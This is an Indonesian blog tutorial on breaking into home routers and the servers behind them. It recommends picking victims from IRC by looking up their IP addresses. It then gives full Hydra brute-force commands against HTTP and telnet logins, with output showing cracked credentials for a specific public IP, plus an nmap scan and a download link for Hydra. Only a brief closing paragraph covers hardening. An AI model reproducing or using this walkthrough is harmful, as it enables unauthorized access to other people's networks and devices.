TUTORIAL BOBOL PASSWORD ROUTER MENGGUNAKAN TOOLS HYDRA


kali ini kita akan jabarkan cara mendapatkan username dan password router dengan hydra.
Apakah anda suka cari target di IRC untuk dihack router speedy atau di PC dibelakang router untuk pentest? Apakah anda masih mengandalkan target yang mengandalkan router speedy dengan keamanan password default yaitu user admin dan password admin ? Kalau anda masih mengandalkan metode serangan password default, maka disini penulis akan memberikan metode tambahan untuk anda yaitu metode brute force.
Disini penulis menggunakan tool Hydra. Hydra adalah tool untuk melakukan hacking password dengan menggunakan metode brute force, dengan anda memiliki kamus kata yang banyak yang dimungkinkan passwordnya ada di dalam kamus tersebut.
Di sini penulis contohkan misal kita join ke mIRC, kita contohkan saja nick ce_imutbgtt, nah whois aja itu nick dan kita akan mendapatkan IPnya.
atau bisa juga kita mengetahui IP router kita dengan cek arp-a misal router LAN 192.168.1.1 atau check IP public di checkmyip.com
Setelah kita dapatkan IPnya maka jalankan saja di browser IP address tersebut.
Setelah dijalankan http://180.254.70.135 maka akan tampil form window seperti dibawah ini
Jika menggunakan username admin dan password admin hasilnya adalah gagal maka anda akan dihadapkan pada 2 hal, terus maju atau tinggalkan target.
Jika anda ingin terus maju maka anda dapat menggunakan teknik brute force. Contohnya untuk melakukan exploitasi dengan hydra adalah
H:\hydra>hydra -m / -l admin -P data.txt 180.254.70.135 http-get
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 14:27:56
[DATA] 11 tasks, 1 servers, 11 login tries (l:1/p:11), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[80][www] host: 180.254.70.135   login: admin   password: baseball
Hydra (http://www.thc.org) finished at 2011-10-17 14:27:57
H:\hydra>
Setelah kita masuk ke router dengan password yang didapat, jika kita ingin melakukan hacking server di belakang router maka kita dapat melakukan IP Forwarding dari router ke Server yang berada dibelakang router.
Disini kita tidak tahu IP-IP lokal berapa saja dibelakang router, karena itu kita dapat mengujinya satu persatu dengan melakukan ping walaupun tidak jaminan.
Disini diasumsikan IP Servernya adalah 192.168.1.2 setelah kita ping dapat.
D:\>ping 180.254.70.135
Pinging 180.254.70.135 with 32 bytes of data:
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
Reply from 180.254.70.135: bytes=32 time=2ms TTL=254
Reply from 180.254.70.135: bytes=32 time=11ms TTL=254
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
Setelah diping jalan maka kita dapat mencoba melakukan scanning dengan NMAP
C:\>nmap -v -A 180.254.70.135
Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-17 15:28 Pacific Daylight Time
NSE: Loaded 36 scripts for scanning.
Initiating Ping Scan at 15:28
Scanning 180.254.70.135 [4 ports]
Completed Ping Scan at 15:28, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 3.09s elapsed
Initiating SYN Stealth Scan at 15:28
Scanning 180.254.70.135 [1000 ports]
Discovered open port 23/tcp on 180.254.70.135
Discovered open port 80/tcp on 180.254.70.135
Discovered open port 3389/tcp on 180.254.70.135
Discovered open port 21/tcp on 180.254.70.135
Completed SYN Stealth Scan at 15:28, 2.34s elapsed (1000 total ports)
Disini dari scanning dengan NMAP kita mendapatkan adanya port 23 yaitu port untuk telnet server. Dengan aktifnya Telnet Server maka kita dapat melakukan brute force ke server Telnet dengan Hydra.
H:\hydra>hydra -l administrator -P data.txt 180.254.70.135 telnet
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 15:21:22
[DATA] 6 tasks, 1 servers, 6 login tries (l:1/p:6), ~1 tries per task
[DATA] attacking service telnet on port 23
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[23][telnet] host: 180.254.70.135   login: administrator   password: sepakbola
Hydra (http://www.thc.org) finished at 2011-10-17 15:21:26
Binggo, kita mendapatkan password telnetnya.
Masukkan login dan passwordnya dan kita akan mendapatkan shell dari telnet server. Contohnya :
Setelah kita klik Open. Masukkan login dan passwordnya.
Binggo, kita masuk ke shell server. :D
Untuk download Hydra. http://0xa.li/files/hydra-6.0-windows.zip. Untuk cari kamusnya untuk brute force dapat dicari sendiri di google, jika ingin buat sendiri juga boleh. Cayooo!
Pengamanannya jika anda ingin tetap dapat dipanggil router speedynya dari luar, maka anda dapat membuat password yang susah ditebak dengan berbagai kombinasi huruf dan angka yang kompleks tapi tetap mudah diingat. Jika ingin lebih aman lagi ya tidak perlu membuat router speedy bisa diakses dari internet, caranya misal dengan melempar port 80 ke IP lain yang kosong atau tidak dipakai.

Comments

Post a Comment

Popular posts from this blog

TUTORIAL HACK MODEM ROUTER ZTE F609

Image
Tutorial kali ini membahas  cara mengetahui password modem telkom indihome ZTE F609 . Untuk pelanggan layanan fiber indihome telkom biasanya sepaket akan dipinjami oleh telkom sebuah modem dan salah satunya modem yang dipakai adalah GPON F609. untuk konfigurasi modem selain bisa diakses melalui browser port 80 modem ini juga bisa diakses melalui telnet port 23, tapi masalahnya bagaimana kalau kita mau setting modem melalui browser sedangkan kita lupa password baru modem yang sudah kita ganti?? Untuk mengatasi lupa password modem, kita bisa hack/bobol modem kita atau modem orang lain misalnya hehehe, kita bisa mengetahui dengan masuk melalui Telnet. Disini saya asumsikan perangkat kita sudah tersambung dengan modem dalam satu network terserah melalui kabel atau WiFi. Contoh Kasus Android saya sudah tersambung ke WiFi Hotspot dengan password WiFi lama sedangkan saya ingin merubah password Wifi saya, otomatis saya harus masuk ke konfigurasi modem dulu sedangkan saya lupa p...
Baca Selengkapnya >>

TUTORIAL LENGKAP CARA HACK ROUTER ZTE 100% WORK

Image
Mungkin sebagian dari anda sudah pernah seting modem adsl speedy melalui telnet, yang tampilannya berupa sebarisan perintah namun lebih kuat kegunaannya dibandingkan seting melalui GUI yang disediakan yang biasa dibuka melalui web browser. ada beberapa kelebihan yang anda bisa dapatkan jika anda mahir dalam menseting modem melalui telnet. misal username untuk login bisa diganti sesuka anda , dimana fitur ini tidak ada di tampilan GUI saat membuka di web browser, setingan wifi yang bisa kita ubah-ubah, dan lain-lain. tetapi di sini saya akan mencoba untuk telnet ke salah satu perangkat FO baru dari TELKOM yang sekarang ini sudah banyak terdapasang di beberapa wilayah di Indonesia salah satunya ONT ZTE F660 v3. sebelum masuk ke perintah yang akan kita coba , pertama kita harus login dlu ke ONT dengan telnet dengan langkah berikut: 1. buka “start” 2. ketik di kotak pencarian “Search Program and Files” dengan kata “cmd” 3. tekan enter 4. maka akan tampil jendela baru berwarna hitam, k...
Baca Selengkapnya >>